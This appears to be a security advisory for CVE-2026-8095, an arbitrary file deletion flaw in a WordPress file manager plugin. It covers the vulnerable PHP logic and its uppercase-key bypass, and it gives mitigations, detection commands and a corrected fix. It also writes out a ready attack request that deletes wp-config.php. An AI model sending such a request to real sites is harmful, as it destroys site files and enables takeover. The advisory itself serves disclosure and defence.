Vulnerability Overview
The nmedia Frontend File Manager Plugin for WordPress contains a high-severity authenticated arbitrary file deletion vulnerability tracked as CVE-2026-8095. The flaw allows an authenticated attacker with as little as Subscriber-level access to delete any file on the web server — including the critical wp-config.php — which can lead to full site compromise.
The vulnerability was discovered and reported by Wordfence and affects all plugin versions through 23.6.
Vulnerability Summary
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-8095 |
| CVSS v3.1 Score | 8.1 (High) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H |
| Type | Arbitrary File Deletion (CWE-73) |
| Affected Plugin | nmedia Frontend File Manager Plugin |
| Affected Versions | All versions ≤ 23.6 |
| Authentication Required | Yes — Subscriber level (low privilege) |
| Assigner | Wordfence |
| Patch Available | No — unpatched at time of disclosure |
Technical Details
The vulnerability resides in the wpfm_file_meta_update AJAX handler. The handler is supposed to block use of the wpfm_dir_path parameter via an unset check, but this check is bypassable using uppercase input.
Root Cause: Uppercase Bypass
// Simplified vulnerable logic
function wpfm_file_meta_update() {
$params = $_POST;
// Developer intended to block this parameter
if (isset($params['wpfm_dir_path'])) {
unset($params['wpfm_dir_path']);
}
// BYPASS: Attacker submits 'WPFM_DIR_PATH' in uppercase
// sanitize_key() converts it back to lowercase
foreach ($params as $key => $value) {
$clean_key = sanitize_key($key);
// Now 'wpfm_dir_path' is present after normalization
update_post_meta($post_id, $clean_key, $value);
}
// The resulting path is passed to unlink() with no containment
delete_file_locally($params['WPFM_DIR_PATH'] . '/' . $filename);
}
function delete_file_locally($path) {
// No directory traversal protection or path containment
unlink($path);
}Attack Request
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.example.com
Cookie: wordpress_logged_in_[hash]=[subscriber_session]
Content-Type: application/x-www-form-urlencoded
action=wpfm_file_meta_update&post_id=1&WPFM_DIR_PATH=/var/www/html/wordpress
&filename=wp-config.php&nonce=[valid_nonce]If successful, this deletes wp-config.php, rendering the site non-functional and potentially enabling an attacker to re-run the WordPress installation wizard to gain administrative control.
CVSS Breakdown
| Metric | Value | Rationale |
|---|---|---|
| Attack Vector | Network | Remotely exploitable via HTTP |
| Attack Complexity | Low | Reliable — no race condition required |
| Privileges Required | Low | Subscriber account sufficient |
| User Interaction | None | No victim interaction needed |
| Confidentiality | None | No direct data exfiltration |
| Integrity | High | Arbitrary file deletion |
| Availability | High | Can render site completely unavailable |
Impact
Successful exploitation enables an authenticated attacker (Subscriber level) to:
- Delete
wp-config.php— exposes database credentials if readable, then breaks the site - Delete theme files — deface or break the front end
- Delete plugin files — disable security plugins like Wordfence
- Delete media uploads — destroy user content
- Trigger reinstallation — if
wp-config.phpis deleted, the next visitor may be prompted to run the WordPress setup wizard, enabling admin account creation by the attacker
Affected Versions
| Plugin Version | Status |
|---|---|
| ≤ 23.6 | Vulnerable |
| No patched version available | — |
Remediation
Immediate Actions (Site Administrators)
Since no patch exists at time of disclosure, apply these interim mitigations:
- Deactivate or remove the plugin until a patched version is released
- Restrict user registration — if public registration is enabled with default Subscriber role, disable it
- Audit existing Subscriber accounts for suspicious activity
- Enforce MFA on all WordPress accounts, especially admin roles
- Deploy a WAF (Wordfence, Sucuri) with file deletion protection rules
- Monitor AJAX requests to
admin-ajax.phpforwpfm_file_meta_updateactions
Detection: Check for Compromise
# Look for AJAX calls to the vulnerable handler
grep "wpfm_file_meta_update" /var/log/apache2/access.log
# Check if wp-config.php is present
ls -la /var/www/html/wordpress/wp-config.php
# Review recently deleted files (if auditd is configured)
ausearch -k file_deletion --start todayDeveloper Fix (Plugin)
The correct fix requires both blocking the uppercase bypass AND implementing path containment:
function wpfm_file_meta_update() {
// Normalize keys before the check
$params = array_change_key_case($_POST, CASE_LOWER);
// Block directory path manipulation
if (isset($params['wpfm_dir_path'])) {
unset($params['wpfm_dir_path']);
}
// ...
}
function delete_file_locally($path) {
// Enforce path containment within the uploads directory
$allowed_base = wp_upload_dir()['basedir'];
$real_path = realpath($path);
if ($real_path === false || strpos($real_path, $allowed_base) !== 0) {
wp_die('Invalid file path.');
}
unlink($real_path);
}Monitoring
Set up alerts for these indicators:
Suspicious Activity Patterns:
- POST to admin-ajax.php with action=wpfm_file_meta_update from non-admin accounts
- Requests containing 'WPFM_DIR_PATH' in POST body
- 404 errors on wp-config.php immediately after plugin AJAX calls
- WordPress setup/install page (wp-admin/setup-config.php) accessed by unknown IPReferences
- NVD — CVE-2026-8095
- Wordfence Threat Intelligence
- CWE-73: External Control of File Name or Path
- RedPacket Security — CVE-2026-8095 Alert
Published: June 28, 2026